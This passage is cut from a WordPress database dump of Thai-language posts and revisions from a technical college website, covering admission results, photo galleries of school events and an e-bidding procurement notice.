'%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%99%e0%b8%b1%e0%b8%81-2', '', '', '2018-03-27 08:56:56', '2018-03-27 01:56:56', '', 0, 'http://www.technicrayong.ac.th/?p=744', 495, 'post', '', 0),
(745, 1, '2018-01-21 15:15:54', '2018-01-21 08:15:54', '<h4><a href=\"/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<strong><span style=\"color: #0000ff;\">มีปัญหาในการสมัครออนไลน์ โทร 094-5166653\r\n</span></strong>\r\n\r\n<strong><span style=\"color: #0000ff;\">นักเรียน/นักศึกษาโควตา\r\nปีการศึกษา 2561.\r\nให้กรอกข้อมูลผ่านระบบออนไลน์. และพิมพ์ใบสมัครมาใช้ประกอบการมอบตัวตามวันเวลาที่กำหนด.\r\n</span></strong>\r\n\r\n \r\n\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '744-revision-v1', '', '', '2018-01-21 15:15:54', '2018-01-21 08:15:54', '', 744, 'http://www.technicrayong.ac.th/744-revision-v1/', 0, 'revision', '', 0),
(746, 1, '2018-01-21 15:17:26', '2018-01-21 08:17:26', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-03-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-04-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-05-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-06-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-07-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-08-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-09-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-10-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-11.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-11-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-12.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-12-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-13.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-13-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-14.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-14-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-15.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-15-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-16.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-16-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-17.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-17-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-18.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-18-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-19.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-19-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-20.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-20-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\"', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%81%e0%b8%82%e0%b9%88%e0%b8%87%e0%b8%82%e0%b8%b1%e0%b8%99%e0%b8%81%e0%b8%b5%e0%b8%ac%e0%b8%b2%e0%b8%a0%e0%b8%b2%e0%b8%a2%e0%b9%83-2', '', '', '2018-03-27 09:02:24', '2018-03-27 02:02:24', '', 0, 'http://www.technicrayong.ac.th/?p=746', 493, 'post', '', 0),
(747, 1, '2018-01-21 15:17:26', '2018-01-21 08:17:26', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-03-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-04-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-05-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-06-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-07-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-08-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-09-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-10-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-11.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-11-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-12.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-12-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-13.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-13-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-14.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-14-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-15.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-15-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-16.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-16-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-17.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-17-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-18.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-18-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-19.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-19-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-20.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-20-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\"', '', 'inherit', 'closed', 'closed', '', '746-revision-v1', '', '', '2018-01-21 15:17:26', '2018-01-21 08:17:26', '', 746, 'http://www.technicrayong.ac.th/746-revision-v1/', 0, 'revision', '', 0),
(748, 1, '2018-01-21 15:22:31', '2018-01-21 08:22:31', 'วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ระดับสถานศึกษาขนาดใหญ่ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ประจำปีการศึกษา 2560 (รอบสอง) วันที่ 25 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-01-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-02-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-03-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-04-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-05-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-06-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-07-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-08-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-09-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-10-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>', 'การประเมินองค์การมาตรฐานดีเด่น', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%ad%e0%b8%87%e0%b8%84%e0%b9%8c%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a1%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%90', '', '', '2018-03-27 09:01:29', '2018-03-27 02:01:29', '', 0, 'http://www.technicrayong.ac.th/?p=748', 491, 'post', '', 0),
(749, 1, '2018-01-21 15:22:31', '2018-01-21 08:22:31', 'วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ระดับสถานศึกษาขนาดใหญ่ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ประจำปีการศึกษา 2560 (รอบสอง) วันที่ 25 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-01-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-02-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-03-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-04-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-05-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-06-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-07-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-08-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-09-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-10-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>', 'การประเมินองค์การมาตรฐานดีเด่น', '', 'inherit', 'closed', 'closed', '', '748-revision-v1', '', '', '2018-01-21 15:22:31', '2018-01-21 08:22:31', '', 748, 'http://www.technicrayong.ac.th/748-revision-v1/', 0, 'revision', '', 0),
(750, 1, '2018-01-21 15:23:40', '2018-01-21 08:23:40', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /> </a><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'ทำบุญตักบาตรข้าวสารอาหารแห้ง', '', 'publish', 'closed', 'open', '', '%e0%b8%97%e0%b8%b3%e0%b8%9a%e0%b8%b8%e0%b8%8d%e0%b8%95%e0%b8%b1%e0%b8%81%e0%b8%9a%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a7%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%b2%e0%b8%ab', '', '', '2018-03-27 09:01:00', '2018-03-27 02:01:00', '', 0, 'http://www.technicrayong.ac.th/?p=750', 489, 'post', '', 0),
(751, 1, '2018-01-21 15:23:40', '2018-01-21 08:23:40', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /> </a><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'ทำบุญตักบาตรข้าวสารอาหารแห้ง', '', 'inherit', 'closed', 'closed', '', '750-revision-v1', '', '', '2018-01-21 15:23:40', '2018-01-21 08:23:40', '', 750, 'http://www.technicrayong.ac.th/750-revision-v1/', 0, 'revision', '', 0),
(752, 1, '2018-01-21 15:24:32', '2018-01-21 08:24:32', '<a href=\"/wp-content/uploads/2018/01/เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์-e-bidding2561-1.pdf\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)2561</a>\r\n\r\n \r\n\r\n<img class=\"alignnone size-thumbnail wp-image-578\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.tif\" alt=\"\" width=\"1\" height=\"1\" /> <img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"aligncenter wp-image-581 size-full\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.jpg\" alt=\"\" width=\"1656\" height=\"2339\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-580 size-full\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.jpg\" alt=\"\" width=\"1656\" height=\"2339\" />', 'ประกาศประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพ ของนักเรียนสายอาชีพ ระดับ ปวช.1 ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b9%80%e0%b8%84-2', '', '', '2018-03-27 08:57:46', '2018-03-27 01:57:46', '', 0, 'http://www.technicrayong.ac.th/?p=752', 487, 'post', '', 0),
(753, 1, '2018-01-21 15:24:32', '2018-01-21 08:24:32', '<a href=\"/wp-content/uploads/2018/01/เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์-e-bidding2561-1.pdf\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)2561</a>\r\n\r\n \r\n\r\n<img class=\"alignnone size-thumbnail wp-image-578\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.tif\" alt=\"\" width=\"1\" height=\"1\" /> <img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"aligncenter wp-image-581 size-full\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.jpg\" alt=\"\" width=\"1656\" height=\"2339\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-580 size-full\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.jpg\" alt=\"\" width=\"1656\" height=\"2339\" />', 'ประกาศประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพ ของนักเรียนสายอาชีพ ระดับ ปวช.1 ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์', '', 'inherit', 